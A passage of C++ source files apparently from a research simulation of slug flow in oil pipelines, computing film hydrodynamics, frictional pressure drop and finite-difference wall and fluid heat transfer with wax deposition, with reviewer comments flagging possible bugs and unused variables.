        //For the Hibiki X-parameter these superficial-velocity factors are needed
        fSF = Film.FannningFrictionFactor(RhoL, VSL, M_PI*ID*ID*0.25, MuL, PipeRoughness);
        fSG = Film.FannningFrictionFactor(RhoG, VSG, M_PI*ID*ID*0.25, MuG, PipeRoughness);
        ShearSF = fSF * RhoL*VSL*VSL / 2.0;
        ShearSG = fSG * RhoG*VSG*VSG / 2.0;
        // NOTE(review): both terms below use (SF + SF); confirm one of the
        // factors was not meant to be a different perimeter (e.g. SI or SG).
        PressSFilm = PressSFilm + ShearSF * (SF + SF)*z / (M_PI*0.25*ID*ID);
        PressSGas = PressSGas + ShearSG * (SF + SF)*z / (M_PI*0.25*ID*ID);
    }
    // Total slug-unit frictional dP; 0.000145038 converts Pa to psi.
    dP = (PressGas + PressFilm + PressSlug)*0.000145038;
}
<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
/* IMPORTANT NOTE
In this method, the objective is to find correct hydrodynamic properties
for t=Tu. The hydrodynamic properties are calcualted based on the
thermophysical properties of liquid and gas and they are heavility dependent
on temperature. However, the temperature anywhere in the slug unit changes
with time and with location. Therefore, thermophysical properties change too.
In addition to thermophysical properties, wax characteristics also change
including the thickness and ultimately the effective pipe's radius which is
very important for hydrodynamic property estimation. This inconsostency needed
to get fixed. In the following method, we find the most appropeiate temperature
for hydrodynamic property calculation. This iterative process is to check Lf
with temperature. Since wax deposition calculation is costly (timely), we
did not included the wax thickness update. In other word, wax characteristics
at tIniial is considered. This assumption should note jepordize the accuracy much*/
/*The following method was checked for many flow rates. While following method's
importance might not be obvious at the first seen but it is!!
For VSG=10 and VSL=1, the average temperautre calculated to be ALOT different than the
intiial Temperature */
/*
 * Iterates the slug-flow heat model until the film length Lf computed from
 * the average bulk temperature stops changing (|Lf1 - Lf2| <= EpsLimit).
 * Each pass rebuilds the hydrodynamic properties at the temperature stored in
 * FilmInputs[3], marches the heat model over all Nx axial steps while carrying
 * the wall/slug/film/gas temperature fields forward, then feeds the new
 * average bulk temperature back into FilmInputs[3] (with the -273.15 K->C
 * conversion).  Returns the converged average bulk temperature AvgTb.
 */
double SlugFlowOveralHeatTranfer::
AvgTempForHydroUpdate(std::vector<double>& FilmInputs,
    std::vector<std::vector<double>>& WaxWidthVector,
    std::vector<std::vector<double>>& WaxSolidFraction,
    std::vector<double>& HydroInputs,
    std::vector<std::vector<std::vector<double>>>& TwInitial,
    std::vector<double>& Ts, std::vector<double>& Tf,
    std::vector<double>& Tg, std::vector<double>& FilmAssign,
    std::vector<bool>& SlugAssign, std::vector<double>& q,
    double TInlet, double EpsLimit)
{
    double Lf1 = 100, Lf2;   // film lengths of two successive iterations
    double Eps = 100;        // convergence measure |Lf1 - Lf2|
    // Cleanup: an unused 1000 x 51 scratch vector ("Save") was removed here.
    double AvgTb = 0;        // average bulk temperature of the current pass
    int count = 0;           // iteration counter (diagnostic only)
    //t=Tu
    while (Eps > EpsLimit)
    {
        //Counter of the number of iterations
        count = count + 1;
        AvgTb = 0;
        MultiphaseTemperature::SlugFLowHeatTransferCal OBJ;
        Lf2 = Lf1;
        // Recompute the hydrodynamics at the temperature in FilmInputs[3].
        OBJ.HydroUpdate(FilmInputs, HydroInputs);
        Lf1 = OBJ.Lf;
        for (int t = 0; t < OBJ.Nx; t++)
        {
            OBJ.SlugFlowHeatModel(FilmInputs, WaxWidthVector,
                WaxSolidFraction, HydroInputs,
                TwInitial, Ts, Tf, Tg, FilmAssign,
                SlugAssign, q, TInlet);
            AvgTb = AvgTb + OBJ.AvgTb;
            // Carry all temperature fields into the next time step.
            TwInitial = OBJ.Tw;
            Ts = OBJ.TS;
            Tf = OBJ.TL;
            Tg = OBJ.TG;
            OBJ.SlugFlowBooleanLater(SlugAssign, FilmAssign);
            SlugAssign = OBJ.SlugFlow;
            FilmAssign = OBJ.HLTbLocation;
        }
        std::cout << OBJ.NuNumCal << " " << OBJ.SumhCheck << std::endl;
        AvgTb = AvgTb / double(OBJ.Nx);
        // Feed the new average temperature (converted to Celsius) back in.
        FilmInputs[3] = AvgTb - 273.15;
        // Portability fix: unqualified abs() on doubles relied on the MSVC
        // <cmath> overload; on other toolchains it could pick int abs().
        Eps = std::fabs(Lf1 - Lf2);
    }
    return(AvgTb);
}
/* The previous method produces the AvgTb temperature required for a correct
calculation of the hydrodynamic properties.  That temperature can now be used
for further calculations over larger time spans.
*/
} //end of MultiphaseTemperature namespace<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
namespace MultiphaseTemperature {
double s1 = 0; bool s2;
/*
 * One time step of the explicit finite-difference heat model for slug flow.
 * The pipe wall is discretized axially (xx = 0..Nx-1), radially into WallLay
 * layers (WL = 1 is the wax deposit in contact with the fluid), and
 * circumferentially into RingSec sections (RS; section 4 mirrors section 2 by
 * symmetry).  For each wall element the energy fluxes Es (radial outward),
 * Er (radial inward / convective), Ex (axial conduction) and ETheta
 * (circumferential conduction) are assembled, then the wall temperatures Tw
 * and the bulk temperatures TS (slug), TL (film liquid) and TG (gas pocket)
 * are advanced in place.  Boundary conditions: fixed TInlet at xx == 0 and
 * zero axial temperature gradient at xx == Nx-1.
 */
void SlugFLowHeatTransferCal::
SlugFlowHeatModel(std::vector<double>& FilmInputs,
    std::vector<std::vector<double>>& WaxWidthVector,
    std::vector<std::vector<double>>& WaxSolidFraction,
    std::vector<double>& HydroInputs,
    std::vector<std::vector<std::vector<double>>>& TwInitial,
    std::vector<double>& Ts, std::vector<double>& Tf,
    std::vector<double>& Tg, std::vector<double>& FilmAssign,
    std::vector<bool>& SlugAssign, std::vector<double>& q,
    double TInlet) {
    // Copy the caller-supplied state into the member fields.
    SetVariablesFromIputFiles(FilmInputs,WaxWidthVector, WaxSolidFraction,
        TwInitial,Ts,Tf,Tg, FilmAssign, SlugAssign);
    //The required vector sizes are assigned
    VectorResize();
    //In this simplified case, the inlet temperature is assumed constant.
    AvgTb = 0;
    //Pipe specs
    const user::PipeGeometry PipeProps;
    PipeSpecs(PipeProps);
    //This call uses the pipe's ID set by PipeSpecs(PipeProps) above.
    IDEf = IDEff(WaxWidthVector);
    Update(AvgTempForHydroUpdate, HLLS);
    for (int xx = 0; xx < Nx; xx++)
    {
        /*The effective flow area differs axially; it is computed by averaging
        the areas implied by the four circumferential wax thicknesses.*/
        ApEff[xx] = 0.25*M_PI*(pow((ri - WaxThickness[xx][1]), 2)
            + pow((ri - WaxThickness[xx][2]), 2) + pow((ri - WaxThickness[xx][3]), 2)
            + pow((ri - WaxThickness[xx][4]), 2));
        //ApEff[xx] = M_PI * ri*ri;
        if (SlugFlow[xx] == false)
        {
            //Film region: stratified flow geometry at the local holdup.
            HLTBAvg = HLTbLocation[xx];
            const StratifiedFlowGeometry FlowGeom(HLTBAvg, IDEf);
            UpdateFlowGeomParams(FlowGeom, HLTBAvg);
        }
        for (int WL = 1; WL < WallLay + 1; WL++) //starts from 1 to 4
        {
            //starts from 1 to 3. Due to symmetry, Ring 2 is assigned to Ring 4
            for (int RS = 1; RS < RingSec; RS++)
            {
                //Thermal conductivity: wax correlation for layer 1, pipe steel otherwise.
                if (WL == 1) {
                    KThermal = WaxDepoK(Tw[xx][WL][RS], WaxSolidFrac[xx][RS]);
                    KDepoSave[xx][RS] = KThermal;
                }
                else {
                    KThermal = KPipe;
                }
                if (WL == 1) //Inner layer contacting the fluid
                {
                    //This method assigns the AG and AL arrays
                    SurfaceAreaAGAL(thetahF, WaxThickness[xx][3],
                        WaxThickness[xx][2], WaxThickness[xx][1]);
                }
                //Es: radial flux through the outer face of the element.
                if (WL == WallLay)
                {
                    // Outermost layer: imposed external heat flux q.
                    Es[xx][WL][RS] = q[xx] * Aout(WL)*dt;
                    check = Aout(WL);
                }
                else
                {
                    //double T[NTime + 1][Nx + 1][WLay + 1][RingSec + 1];
                    Es[xx][WL][RS] = Aout(WL) * KThermal*(Tw[xx][WL + 1][RS] -
                        Tw[xx][WL][RS])*dt*3.0 / w;
                }
                //Er: radial flux through the inner face of the element.
                //For the innermost layer it is convective (fluid -> wall).
                if (WL == 1) //Heat is convectively transferred from fluid to wall
                {
                    if (SlugFlow[xx] == true)
                    {
                        //The following if/else takes care of x=0 and x=N-1
                        if (xx == Nx - 1)
                        {
                            //dT/dx = 0 boundary condition assumed at the end
                            Update(TS[xx], HLLS);
                            Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS])*HeatCoe(KS, IDEf,
                                RhoS, Vm, MuS, CpS) *dt*(Tw[xx][WL][RS] - TS[xx]);
                        }
                        else //Any xx other than the last one
                        {
                            Update(TS[xx], HLLS);
                            Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS])*
                                HeatCoe(KS, IDEf, RhoS, Vm, MuS, CpS)*
                                dt*((Tw[xx + 1][WL][RS] + Tw[xx][WL][RS])
                                / 2.0 - TS[xx]);
                        }
                        EWsLocal[RS] = -Er[xx][WL][RS];
                        if (RS == 2)
                            EWsLocal[4] = EWsLocal[2];
                    }
                    else //Film section: split between liquid film and gas pocket
                    {
                        //the following if/else takes care of x=N-1
                        if (xx == Nx - 1)
                        {
                            AvgTemp = Tw[xx][WL][RS];//This variable is used in Er calculations
                        }
                        else
                        {
                            //This variable is used in Er calculations
                            AvgTemp = (Tw[xx + 1][WL][RS] + Tw[xx][WL][RS]) / 2.0;
                        }
                        //EwfLocal (wall->liquid) and EwgLocal (wall->gas)
                        Update(TL[xx], HLLS); EwfLocal[RS] = AL[RS] * HeatCoe(KL, dL, RhoL, VLTB,
                            MuL, CpL)*dt*(AvgTemp - TL[xx]);
                        Update(TG[xx], HLLS); EwgLocal[RS] = AG[RS] * HeatCoe(KG, dG, RhoG, VGTB,
                            MuG, CpG)*dt*(AvgTemp - TG[xx]);
                        //Er calculation
                        Er[xx][WL][RS] = -(EwfLocal[RS] + EwgLocal[RS]);
                        //Assigning RS=2 to RS=4 (the sidewall sections are the same)
                        if (RS == 2) { EwfLocal[4] = EwfLocal[2]; EwgLocal[4] = EwgLocal[2]; }
                    }
                }
                else //Wall layers other than the first one: pure conduction
                {
                    Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS]) *
                        KThermal*(Tw[xx][WL][RS] -
                        Tw[xx][WL - 1][RS])*dt*3.0 / w;
                }
                //Ex: axial conduction; the if/else handles x=0 and x=N-1
                if (xx == Nx - 1)
                {
                    // Zero-gradient outlet: the forward neighbor is replaced
                    // by the node itself.
                    Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
                        KThermal*dt*(1 / dX)*(Tw[xx][WL][RS] -
                        2 * Tw[xx][WL][RS] + Tw[xx - 1][WL][RS]);
                }
                else if (xx == 0)
                {
                    // Inlet: the backward neighbor is the fixed TInlet.
                    Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
                        KThermal*dt*(1 / dX)*(Tw[xx + 1][WL][RS] -
                        2 * Tw[xx][WL][RS] + TInlet);
                }
                else // xx other than xx==0 and xx==Nx-1
                {
                    Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
                        KThermal*dt*(1 / dX)*(Tw[xx + 1][WL][RS] -
                        2 * Tw[xx][WL][RS] + Tw[xx - 1][WL][RS]);
                }
                //ETheta: circumferential conduction; RS==1 wraps around to RS=4.
                if (RS == 1)
                {
                    ETheta[xx][WL][RS] = ATheta(WL, WaxThickness[xx][RS]) *
                        KThermal*dt*(1 / dxTheta(WL, WaxThickness[xx][RS]))*
                        (Tw[xx][WL][RS + 1] - 2 * Tw[xx][WL][RS]
                        + Tw[xx][WL][4]);
                }
                else { //Ring section other than the first one
                    ETheta[xx][WL][RS] = ATheta(WL, WaxThickness[xx][RS]) *
                        KThermal*dt*(1 / dxTheta(WL, WaxThickness[xx][RS]))*
                        (Tw[xx][WL][RS + 1] - 2 * Tw[xx][WL][RS]
                        + Tw[xx][WL][RS - 1]);
                }
                //Energy balance for the ring element: advance Tw in place.
                if (WL == 1)
                {
                    //CpL was used for the heat capacity of the wax deposit, PLEASE CHECK!!
                    Tw[xx][WL][RS] = Tw[xx][WL][RS] + (Es[xx][WL][RS] +
                        Er[xx][WL][RS] + Ex[xx][WL][RS] + ETheta[xx][WL][RS])
                        / (Ax(WL, WaxThickness[xx][RS])*dX*RhoDepo*CpL);
                }
                else
                {
                    Tw[xx][WL][RS] = Tw[xx][WL][RS] + (Es[xx][WL][RS] +
                        Er[xx][WL][RS] + Ex[xx][WL][RS] + ETheta[xx][WL][RS])
                        / (Ax(WL, WaxThickness[xx][RS])*dX*RhoPipe*CPPipe);
                }
                if (RS == 2)
                {
                    //By symmetry, section 4 receives the energies/temperature of section 2.
                    Es[xx][WL][4] = Es[xx][WL][RS];
                    Er[xx][WL][4] = Er[xx][WL][RS];
                    Ex[xx][WL][4] = Ex[xx][WL][RS];
                    ETheta[xx][WL][4] = ETheta[xx][WL][RS];
                    Tw[xx][WL][4] = Tw[xx][WL][RS];
                    //std::cout << std::setprecision(10) << Tw[tt + 1][xx][WL][4] << " ";
                }
            }//End of ring sections of one ring
        }//End of wall layers
        // Total wall-to-fluid energies at this axial node (all 4 ring sections).
        if (SlugFlow[xx] == false)
        {
            sumWF = 0;
            sumWG = 0;
            //Here the fourth ring section must also be included
            for (int itr = 1; itr < RingSec + 1; itr++)
            {
                sumWF = EwfLocal[itr] + sumWF;
                sumWG = EwgLocal[itr] + sumWG;
            }
            EWf[xx] = sumWF;
            EWG[xx] = sumWG;
        }
        else
        {
            sumWS = 0;
            //Here the fourth ring section must also be included
            for (int itr = 1; itr < RingSec + 1; itr++)
            {
                sumWS = EWsLocal[itr] + sumWS;
            }
            EWS[xx] = sumWS;
        }
        //Convective (axial transport) energies; dT/dx = 0 at x=N-1.
        if (xx == Nx - 1)
        {
            if (SlugFlow[xx] == false)
            {
                ECF[xx] = 0;
                ECG[xx] = 0;
            }
            else // slug
            {
                ECS[xx] = 0;
            }
        }
        else
        {
            if (SlugFlow[xx] == false)
            {
                Update(TL[xx], HLLS);
                if (HLTbLocation[xx + 1] > 0.000001) {
                    HLTB2 = HLTbLocation[xx + 1];
                }
                else {
                    HLTB2 = HLTBAvg;
                }
                Update(TL[xx + 1], HLLS);
                //ECF[xx] = ECF2- ECF1;
                Update((TL[xx + 1] + TL[xx]) / 2.0, HLLS);
                ECF[xx] = (VTb - VLTB)*ApEff[xx] * HLTBAvg*RhoL*
                    CpL*dt*(TL[xx + 1] - TL[xx]);
                Update(TG[xx], HLLS);
                ECG1 = Cs * ApEff[xx] * Vm*(1 - HLLS)*dt*CpG*RhoG*TG[xx];
                Update(TG[xx + 1], HLLS);
                ECG2 = Cs * ApEff[xx + 1] *
                    Vm*(1 - HLLS)*dt*CpG*RhoG*TG[xx + 1];
                Update((TG[xx + 1] + TG[xx]) / 2.0, HLLS);
                ECG[xx] = Cs * ApEff[xx] * Vm*(1 - HLLS)*
                    dt*CpG*RhoG*(TG[xx + 1] - TG[xx]);
            }
            else // Slug
            {
                Update(TS[xx], HLLS);
                Update((TS[xx + 1] + TS[xx]) / 2.0, HLLS);
                ECS[xx] = Cs * ApEff[xx] * Vm*RhoS*CpS*dt*(TS[xx + 1] - TS[xx]);
            }
        }
        // Average inner-wall temperature over the four ring sections.
        TwAv[xx] = (Tw[xx][1][1] + Tw[xx][1][2] + Tw[xx][1][3] + Tw[xx][1][4]) / 4.0;
        //Now the balance equations can be written for TL, TG and TS
        if (SlugFlow[xx] == false)
        {
            //needs fix
            // Interfacial coefficient: series combination of the two film
            // coefficients at the liquid-gas interface.
            UInt = 1 / (1 / (HeatCoe(KG, dG, RhoG, abs(VGTB - VLTB), MuG, CpG))
                + 1 / (HeatCoe(KL, dL, RhoL, abs(VGTB - VLTB), MuL, CpL)));
            //Future TG
            TG[xx] = TG[xx] + (EWG[xx] + ECG[xx] + SI * dX* UInt*dt*(TL[xx] - TG[xx])) /
                ((1 - HLTBAvg)*ApEff[xx] * dX*CpG*RhoG);
            //Future TL
            TL[xx] = TL[xx] + (EWf[xx] + ECF[xx] + SI * dX * UInt*dt*(TG[xx] - TL[xx])) /
                (HLTBAvg*ApEff[xx] * dX*CpL*RhoL);
            TLActual[xx] = TL[xx]; TGActual[xx] = TG[xx];
            //Future Tb: flow-weighted mixture of liquid and gas temperatures
            Tb[xx] = (TL[xx] * VLTB*ALP + TG[xx] * VGTB*AGP) /
                (VLTB*ALP + VGTB * AGP);
            AvgTb = AvgTb + Tb[xx];
            Kb[xx] = (KLSave * VLTB*ALP + KG * KGSave*AGP) /
                (VLTB*ALP + VGTB * AGP);
            TS[xx] = Tb[xx];
            // Running totals used for the convective heat transfer coefficient.
            QFSum = QFSum + (EWf[xx] + EWG[xx])*dX / (dX*dt*M_PI*IDEf);
            TfSum = TfSum + (-Tb[xx] + TwAv[xx])*dX;
            hHotSave[xx] = QFSum / TfSum;
        }
        else //Slug
        {
            Update(TS[xx], HLLS);
            // The slug is well mixed: TL, TG and TS all advance by the same
            // energy balance; phase split uses the slug holdup HLLS.
            TG[xx] = TG[xx] + (1 - HLLS)*(ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
            TL[xx] = TL[xx] + HLLS * (ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
            TS[xx] = TS[xx] + (ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
            TLActual[xx] = TS[xx];
            TGActual[xx] = TS[xx];
            Tb[xx] = TS[xx];
            AvgTb = AvgTb + Tb[xx];
            Kb[xx] = KS;
            //For the convective heat transfer coefficient calculation
            QSSum = QSSum + (EWS[xx])*dX / (dX*dt*M_PI*IDEf);
            TSSum = TSSum + (-Tb[xx] + TwAv[xx])*dX;
            hHotSave[xx] = QSSum / TSSum;
        }
        Update(Tw[xx][1][1], HLLS);
        // NOTE(review): `help` is written but never read — debugging leftover?
        double help = MuL;
        Update(Tb[xx], HLLS);
        if (xx != 0)
        {
            // Single-phase reference coefficient accumulated for comparison.
            SumhCheck = SumhCheck + (1 / IDEf)*KL*
                SinglePhaseNu(RhoL, VSL, IDEf,
                MuL, CpL, KL, xx*dX,
                PipeRoughness, VSL /
                (VSL + VSG));
        }
    }//End of axial loop
    AvgTb = AvgTb / double(Nx);
    NuNumCal = (QSSum + QFSum) / (TSSum + TfSum);
    SumhCheck = SumhCheck / double(Nx);
}//End of SlugFlowHeatModel
void SlugFLowHeatTransferCal::
	SetVariablesFromIputFiles(std::vector<double>& FilmInputs,
		std::vector<std::vector<double>>& WaxWidthVector,
		std::vector<std::vector<double>>& WaxSolidFraction,
		std::vector<std::vector<std::vector<double>>>& TwInitial,
		std::vector<double>& Ts, std::vector<double>& Tf,
		std::vector<double>& Tg, std::vector<double>& FilmAssign,
		std::vector<bool>& SlugAssign){
	//Copy the packed input vectors into the class's named state.
	//FilmInputs layout: [0]=VSL, [1]=VSG, [2]=(unused here, see note),
	//[3]=average temperature for hydrodynamic updates, [4]=pressure,
	//[5]=pipe roughness, [6]=interfacial tension.
	VSL = FilmInputs[0];
	VSG = FilmInputs[1];
	//T = SlugFLowHeatTransferCalInputs[2];
	AvgTempForHydroUpdate= FilmInputs[3];
	/* Please note that this temperature is used as a default
	temperature value for thermophysical property calculation */
	P = FilmInputs[4];
	PipeRoughness = FilmInputs[5];
	IT = FilmInputs[6];//Interfacial tension
	//Wax deposit geometry/composition per axial cell and ring sector.
	WaxThickness = WaxWidthVector;
	WaxSolidFrac = WaxSolidFraction;
	//Initial wall temperature field [axial][wall layer][ring sector].
	Tw = TwInitial;
	//Initial phase temperature profiles: liquid film, gas, slug body.
	TL = Tf;
	TG = Tg;
	TS = Ts;
	//Initial film holdup per cell and slug/film boolean per cell.
	HLTbLocation = FilmAssign;
	SlugFlow = SlugAssign;
}
//In this method, heat transfer coefficient is calculated
double SlugFLowHeatTransferCal::HeatCoe(double K, double d, double Rho,
	double V, double Mu, double Cp)
{
	//Dittus-Boelter-type single-phase convective coefficient:
	//h = 0.023 (K/d) Re^0.8 Pr^(1/3).
	const double Re = Rho * V * d / Mu;   //Reynolds number
	const double Pr = Cp * Mu / K;        //Prandtl number
	return (0.023*K / d) * pow(Re, 0.8) * pow(Pr, 1.0 / 3.0);
}
double SlugFLowHeatTransferCal::DistCoe(double Rho, double V, double d, double Mu)
{
	//Distribution coefficient c = co - 1, with co = 2 for laminar flow
	//(Re <= 2100) and co = 1.2 for turbulent flow.
	const double Re = Rho * V * d / Mu;
	const double co = (Re <= 2100) ? 2.0 : 1.2;
	return co - 1;
}
//Refresh all phase thermophysical properties at temperature T (Kelvin;
//converted to Celsius for the property package) and the current pressure P,
//then recompute holdup-weighted slug-body mixture properties from HLLS.
void SlugFLowHeatTransferCal::Update(double T,double HLLS)
{
	user::FluidProperties Fluid(T-273.15, P);
	RhoL = Fluid.Liquid.Rho(Fluid);
	RhoG = Fluid.Gas.Rho(Fluid);
	MuL = Fluid.Liquid.Mu(Fluid);
	MuG = Fluid.Gas.Mu(Fluid);
	KL = Fluid.Liquid.K(Fluid);
	KG = Fluid.Gas.K(Fluid);
	CpL = Fluid.Liquid.Cp(Fluid);
	CpG = Fluid.Gas.Cp(Fluid);
	//Slug properties: simple holdup-weighted averages of the two phases.
	KS = HLLS * KL + (1 - HLLS)*KG;
	RhoS = HLLS * RhoL + (1 - HLLS)*RhoG;
	MuS = HLLS * MuL + (1 - HLLS)*MuG;
	CpS = HLLS * CpL + (1 - HLLS)*CpG;
}
//Please note that the temperature in FilmInputs needs to be in in Centigrade
//Recompute the slug-flow hydrodynamics (film profile, velocities, lengths,
//grid spacing) from the film/hydro input vectors and resample the film
//holdup profile onto the heat-transfer axial grid.
//HydroInputs layout: [0]=initial guess for Lf, [1]=Newton step, [2]=mass
//balance tolerance, [3]=max RK45 step, [4]=HLLS iteration tolerance.
void SlugFLowHeatTransferCal::HydroUpdate(std::vector<double>&FimInputs,
	std::vector<double>& HydroInputs)
{
	double InitialGuess, dxx, Epsilon, hMax, EpsilonZh;
	std::vector<double> xAxisOrg, HLTBOrg;
	double Temp; //NOTE(review): unused
	//HydroInputs for final hydrodynamic properties of slug flow
	InitialGuess = HydroInputs[0];
	dxx = HydroInputs[1];
	Epsilon = HydroInputs[2];
	hMax = HydroInputs[3];
	EpsilonZh = HydroInputs[4];
	//Pipe specs
	const user::PipeGeometry PipeProps;
	PipeSpecs(PipeProps);
	FilmProfile Film(FimInputs);
	PressureCal Press(FimInputs, HydroInputs);
	//These two variables are for VSL and VSG for X parameter
	PressFilm = Press.PressSFilm;
	PressGas = Press.PressSGas;
	//Calculating the film profile
	Film.HyrodynamicProperties(InitialGuess, dxx, Epsilon, hMax, EpsilonZh);
	//Copy converged hydrodynamic results into class state.
	VTb = Film.VTb;
	HLLS = Film.HLLS;//NP
	VLLS = Film.VLLS;//NP
	VGLS = Film.VGLS;//NP
	VGTB = Film.VGTB;
	VLTB = Film.VLTB;
	Ls = Film.Ls;//NP
	Vm = Film.Vm;//NP
	Lf = Film.LfFinal;//NP
	Lu = Lf + Ls; //slug unit length = film + slug body
	//HLTBAvg = Film.HLTBAvg;
	ro = OD / 2.0;
	ri = IDPipe / 2.0;
	w = ro - ri; //pipe wall thickness
	dX = Lu / double(Nx);  //axial cell size
	dt = dX / VTb;         //time step follows the Taylor bubble
	NxS = round(Ls / dX);  //cells in slug body
	NxF = round(Lf / dX);  //cells in film region
	//Copy the RK45 film profile (axial position, holdup) out of Film.
	for (int i = 0; i < Film.ZSize + 1; i++)
	{
		xAxisOrg.push_back(Film.XSave[i]);
		HLTBOrg.push_back(Film.HLTBSave[i]);
	}
	for (int i = 0; i < NxF; i++) //check for Nx+1
	{
		xAxisNew.push_back(i*dX);
	}
	//In this section, the adjusted film profile is calculated:
	//linearly interpolate the RK45 holdup profile onto the uniform grid.
	double x1, x2,y1,y2;
	double m;
	for (int i = 0; i < NxF; i++)
	{
		for (int j = 0; j < Film.ZSize + 1; j++)
		{
			if (xAxisNew[i] < Film.XSave[j])
			{
				x1 = Film.XSave[j-1];
				x2 = Film.XSave[j];
				y1 = Film.HLTBSave[j-1];
				y2 = Film.HLTBSave[j];
				m = (y2 - y1) / (x2 - x1);
				HLTBOrgNew.push_back(y1 + m * (xAxisNew[i] - x1));
				//std::cout << xAxisNew[i] << " " << HLTBOrgNew[i] << std::endl;
				break;
			}
		}
	}
	double n,X_middle, Y_middle; //NOTE(review): unused
	//Shift holdup/position to cell midpoints (average of neighbors).
	for (int i = 0; i < NxF-1; i++)
	{
		HLTBOrgNew[i] = (HLTBOrgNew[i + 1] + HLTBOrgNew[i])*0.5;
		xAxisNew[i] = (xAxisNew[i] + xAxisNew[i + 1])*0.5;
	}
}
//Single-phase Nusselt number (Gnielinski-type correlation with an entrance
//correction) scaled by a two-phase multiplier RHS2 built from the liquid
//holdup H and the Lockhart-Martinelli-style parameter X.
//Parameters: Rho,v,D,Mu,Cp,K = fluid properties/velocity/diameter; dx =
//axial position (entrance-length term); E = pipe roughness; H = liquid
//holdup fraction.
//Cleanup: removed dead locals (RHS, Alpha, Phi2, m) that were computed but
//never used in the returned value; Alpha was also read uninitialized-free
//but declared without initialization.
double SlugFLowHeatTransferCal::SinglePhaseNu(double Rho, double v, double D,
	double Mu, double Cp, double K,double dx,double E,double H)
{
	double Nu1, f, Ref, Prf;
	//X is built from the film/gas superficial pressure gradients.
	double X = pow((PressFilm / PressGas), 0.5);
	//Two-phase multiplier applied to the single-phase Nusselt number.
	double RHS2 = pow(H, -0.194)*(1 + 0.687*pow(X, -0.7));
	Ref = Rho * v*D / Mu;  //Reynolds number
	Prf = Mu * Cp / K;     //Prandtl number
	//Swamee-Jain explicit friction factor (rough pipe).
	f = 1.325 / pow(log(E / (3.7*IDEf) + 5.74 / (pow(Ref, 0.9))), 2);
	//Gnielinski correlation with (1 + (D/dx)^(2/3)) entrance correction.
	Nu1 = (((f / 8.0)*(Ref - 1000)*Prf) / (1 + 12.7*pow(f / 8.0, 0.5)*
		(pow(Prf, 2.0 / 3.0) - 1)))*(1 + pow(D / dx, 2.0 / 3.0));
	return(Nu1*RHS2);
}
//Splits the inner pipe surface of one axial cell into liquid-wetted (AL)
//and gas-wetted (AG) areas for each of the four ring sectors (1=bottom,
//2/4=sides, 3=top), based on the wetted angle thetahF and the local wax
//thickness at top/side/bottom.
//NOTE(review): the parameter Theta is never used; the member thetahF is
//read instead — confirm whether Theta was meant to be assigned/used here.
void SlugFLowHeatTransferCal::SurfaceAreaAGAL(double Theta, double Top,
	double Side, double Bot)
{
	//Liquid level within the bottom quarter only.
	if (thetahF <= M_PI * 0.5)
	{
		AL[1] = (ri- Bot) * thetahF*dX;
		AG[1] = (ri- Bot) * (0.5*M_PI - thetahF)*dX;
		AL[2] = 0;
		AG[2] = (ri- Side) * 0.5*M_PI*dX;
		AL[3] = 0;
		AG[3] = (ri- Top) * 0.5*M_PI*dX;
		AL[4] = 0;
		AG[4] = (ri- Side) * 0.5*M_PI*dX;
	}//thetahF <= M_PI * 0.5
	//Liquid level reaches into the side quarters; split side area equally
	//between the two side sectors (factor 0.5).
	if (thetahF > M_PI * 0.5 && thetahF <= 3.0*M_PI * 0.5)
	{
		AL[1] = 0.5*M_PI*(ri- Bot)*dX;
		AG[1] = 0;
		AL[2] = 0.5*(ri- Side)*(thetahF - 0.5*M_PI)*dX;
		AG[2] = 0.5*(ri- Side)*(3.0*M_PI / 2.0 - thetahF)*dX;
		AL[3] = 0;
		AG[3] = (ri- Top) * 0.5*M_PI*dX;
		AL[4] = 0.5*(ri- Side)*(thetahF - 0.5*M_PI)*dX;
		AG[4] = 0.5*(ri- Side)*(3.0*M_PI / 2.0 - thetahF)*dX;
	}//(thetahF > M_PI * 0.5 && thetahF <= 3.0*M_PI * 0.5)
	//Liquid level reaches the top quarter.
	if (thetahF > 3.0*M_PI * 0.5)
	{
		AL[1] = 0.5*M_PI*(ri- Bot)*dX;
		AG[1] = 0;
		AL[2] = 0.5*M_PI*(ri- Side)*dX;
		AG[2] = 0;
		AL[3] = (ri- Top) * (thetahF - 3.0*M_PI / 2.0)*dX;
		AG[3] = (ri- Top) * (2 * M_PI - thetahF)*dX;
		AL[4] = 0.5*M_PI*(ri- Side)*dX;
		AG[4] = 0;
	}//(thetahF > 3.0*M_PI * 0.5)
}
//Copies the dimensionless stratified-flow geometry (scaled by the effective
//inner diameter IDEf) into class state and recomputes the film/gas actual
//velocities from a mass balance between the slug body and the film at local
//holdup HL, then refreshes the two distribution coefficients.
void SlugFLowHeatTransferCal::UpdateFlowGeomParams
	(const StratifiedFlowGeometry& FlowGeom,
	double HL){
	thetahF = FlowGeom.Theta;          //wetted angle
	AGP = FlowGeom.AGTilt*IDEf*IDEf;   //gas flow area
	ALP = FlowGeom.ALTilt*IDEf*IDEf;   //liquid flow area
	SI = FlowGeom.SITilt*IDEf;         //interfacial perimeter
	dL = FlowGeom.dL;
	dG = FlowGeom.dG;
	//Mass balance in the frame moving with the Taylor bubble (VTb).
	VLTB = VTb - (VTb - VLLS)*HLLS / HL;
	VGTB = VTb - (VTb - VGLS)*(1 - HLLS) / (1 - HL);
	VG = VGTB;
	VL = VLTB;
	Cg = DistCoe(RhoG, VGTB, dG, MuG);
